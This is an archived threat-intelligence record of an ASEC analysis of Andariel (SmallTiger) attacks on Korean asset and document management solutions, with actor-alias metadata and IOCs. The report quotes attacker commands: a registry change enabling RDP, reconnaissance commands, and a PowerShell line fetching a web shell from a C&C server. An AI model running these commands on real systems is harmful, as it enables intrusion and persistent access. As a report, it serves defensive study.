{
	"id": "2e2f0792-f67c-4808-849d-499957e11fce",
	"created_at": "2026-04-06T00:13:49.877504Z",
	"updated_at": "2026-04-10T03:34:54.423216Z",
	"deleted_at": null,
	"sha1_hash": "43471ddfed1ab83e9447d3566ecdfb694204ff68",
	"title": "Analysis of Attack Cases Against Korean Solutions by the Andariel Group (SmallTiger) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1670703,
	"plain_text": "Analysis of Attack Cases Against Korean Solutions by the Andariel Group (SmallTiger) - ASEC\r\nBy ATCP\r\nPublished: 2024-12-22 · Archived: 2026-04-05 18:46:46 UTC\r\nThe Andariel group has for years been attacking various software used by South Korean companies [1]. Notably, these include asset management solutions and data loss prevention (DLP) solutions, and cases of vulnerability exploitation have also been identified in various other solutions.\r\nAttack cases by the Andariel group have continued into the second half of 2024, primarily installing SmallTiger [2]. A major example of software targeted for exploitation is Korean asset management solutions, which have been exploited for years, and there are also indications of exploitation involving a document centralization solution.\r\n1. Attack Cases on Korean Asset Management Solutions\r\nAsset management solutions are continuously exploited in attacks, and given their nature it is presumed that, once the control server is compromised, the threat actor uses it to execute malware installation commands. In most of these attack cases, ModeLoader was installed.\r\nAdditionally, there has been a case where control was seized through brute-force and dictionary attacks on exposed update servers. In this case, the threat actor replaced the update program with SmallTiger, attempting to distribute SmallTiger to the systems within the organization through the update process.\r\nIn the recently identified case, neither the initial access vector nor the specific distribution method has been determined, but SmallTiger was installed in the installation path of the asset management solution, and a keylogger was used alongside it. The keylogger is unique in that it stores the user’s keystrokes in the “MsMpLog.tmp” file in the same path.\r\nFigure 1. Keylogging data\r\nUsing SmallTiger, the threat actor configured the infected system to allow future RDP access; the following command, which enables RDP, was executed through SmallTiger. Additionally, an open-source tool called CreateHiddenAccount was installed to add and conceal a backdoor account.\r\n\u003e reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\r\nFigure 2. RDP activation command executed through SmallTiger\r\n2. Attack Cases on Document Management Solution\r\nRecently, there have been indications of attacks targeting a Korean document management solution. The Apache Tomcat web servers used by this solution were all outdated versions, and it is presumed that the threat actor targets installations where the latest updates have not been applied.\r\nFigure 3. Compromised web server with Korean document management solution installed\r\nAfter initial access, the threat actor queried basic system information, and there is also a record of Advanced Port Scanner being installed.\r\n\u003e ping 20.20.100.32\r\n\u003e tasklist\r\n\u003e ipconfig /all\r\n\u003e netstat -noa\r\n\u003e whoami\r\nIt is presumed that a web shell was subsequently installed using the following PowerShell command. The file can no longer be downloaded, but the download server “45.61.148[.]153” is also identified as the C\u0026C server address for SmallTiger in the aforementioned attack case.\r\npowershell.exe (New-Object System.Net.WebClient).DownloadFile('hxxp://45.61.148[.]153/pizza.jsp','C:\\*********\\web\\*********\\threadstate.jsp')\r\n3. Conclusion\r\nASEC has recently confirmed that the Andariel group is resuming its attacks using SmallTiger. The group has for years been exploiting various Korean solutions or attacking vulnerabilities to install malware. The recently identified attack cases involve the ongoing exploitation of asset management solutions and newly identified indications of attacks against a Korean document management solution.\r\nCorporate security managers should strengthen the monitoring of centralized management solutions such as asset management or document management solutions, and apply patches whenever there are security vulnerabilities in these programs. They should also apply the latest patches for the OS and programs such as internet browsers, and update V3 to the latest version to prevent malware infection in advance.\r\nMD5\r\n3525a8a16ce8988885d435133b3e85d8\r\n45ef2e621f4c530437e186914c7a9c62\r\n6a58b52b184715583cda792b56a0a1ed\r\nb500a8ffd4907a1dfda985683f1de1df\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//45[.]61[.]148[.]153/pizza[.]jsp\r\nAdditional IOCs are available on AhnLab TIP.\r\nIP\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/85400/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/85400/"
	],
	"report_names": [
		"85400"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434429,
	"ts_updated_at": 1775792094,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/43471ddfed1ab83e9447d3566ecdfb694204ff68.pdf",
		"text": "https://archive.orkl.eu/43471ddfed1ab83e9447d3566ecdfb694204ff68.txt",
		"img": "https://archive.orkl.eu/43471ddfed1ab83e9447d3566ecdfb694204ff68.jpg"
	}
}